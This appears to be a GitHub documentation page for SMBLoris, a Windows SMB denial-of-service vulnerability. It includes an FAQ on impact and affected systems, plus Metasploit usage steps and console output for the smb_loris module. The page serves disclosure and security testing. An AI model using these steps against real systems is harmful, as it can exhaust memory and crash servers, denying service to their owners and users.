SMBLoris Denial of Service Metasploit Module

What is SMBLoris?

SMBLoris is a remote and uncredentialed denial of service attack against Microsoft® Windows® operating systems, caused by a 20+ year old vulnerability in the Server Message Block (SMB) network protocol implementation.

What versions of Windows are affected?

The vulnerability is in all modern versions of Windows, at least from Windows 2000 through Windows 10. Systems are still vulnerable even if all versions of SMB (1, 2, and 3) are disabled.

What is the threat?

It is computationally inexpensive for an attacker to cause large memory allocations and enormous amounts of wasted CPU cycles, rendering vulnerable machines completely unusable, making business-critical services (such as web and mail servers) unavailable, and even causing the entire operating system to crash.

Scenario Sockets Attack Cost Memory Impact
Baseline 1 4 bytes 128 KiB
Single IPv4 65,535 256 KiB 8 GiB
Single IPv6 65,535 256 KiB 8 GiB
Dual IPv4 / IPv6 131,070 512 KiB 16 GiB
10 IPs 655,535 2.5 MiB 80 GiB
  • † CPU impact cannot be meaningfully measured, but is generally quite significant.
  • ‡ Attack cost is measured by how many bytes of TCP data an attacker must send over the network.
    It does not include standard network headers, which are also small overhead for the attacker.

Is there a CVE?

SMBLoris has not (yet?) been assigned a CVE. Some similar vulnerabilities include:

  • CVE-2012-5568
  • MS09-048 (CVE-2009-1925 and CVE-2009-1926)
  • CVE-2008-4609
  • CVE-2007-6750

Is there a patch?

Not at this time.

What ports are affected?

Generally, SMB runs on port 445. The NetBIOS service on port 139 is probably also exploitable.

auxiliary/dos/smb/smb_lorris Metasploit Module

This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See the SMBLoris page for details on the vulnerability.

The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.

Verification Steps

Example steps in this format (is also in the PR):

  1. Start msfconsole
  2. Do: use auxiliary/dos/smb/smb_lorris
  3. Do: set RHOST [IP]
  4. Do: run
  5. Target should allocate increasing amounts of memory.
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris

msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >

msf auxiliary(smb_loris) > run

[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....

Source: Github